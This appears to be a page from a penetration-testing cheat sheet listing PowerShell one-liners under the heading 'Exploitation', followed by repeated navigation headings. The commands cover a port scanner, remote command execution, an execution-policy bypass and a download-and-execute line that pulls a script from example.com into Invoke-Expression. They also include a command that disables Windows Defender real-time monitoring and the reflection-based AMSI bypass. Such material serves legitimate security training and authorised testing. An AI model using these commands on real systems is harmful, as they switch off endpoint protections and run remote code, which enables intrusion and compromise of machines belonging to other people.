Exploitation

1) Port Scanning

1..1024 | ForEach-Object { $sock = New-Object System.Net.Sockets.TcpClient; $async = $sock.BeginConnect('localhost', $_, $null, $null); $wait = $async.AsyncWaitHandle.WaitOne(100, $false); if($sock.Connected) { $_ } ; $sock.Close() }

2) Remote Command Execution

Invoke-Command -ComputerName TargetPC -ScriptBlock { whoami } -Credential (Get-Credential)

3) Bypass Execution policy

Set-ExecutionPolicy Bypass -Scope Process -Force; .\script.ps1

4) Execute remote scripts

$url = 'http://example.com/script.ps1'; Invoke-Expression (New-Object Net.WebClient).DownloadString($url)

5) Disable Windows Defender

Set-MpPreference -DisableRealtimeMonitoring $true

6) Bypass AMSI

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

PreviousEvasion and Stealth NextPassword Attacks

Last updated 4 months ago

hashtag1) Port Scanning

hashtag2) Remote Command Execution

hashtag3) Bypass Execution policy

hashtag4) Execute remote scripts

hashtag5) Disable Windows Defender

hashtag6) Bypass AMSI

1) Port Scanning

2) Remote Command Execution

3) Bypass Execution policy

4) Execute remote scripts

5) Disable Windows Defender

6) Bypass AMSI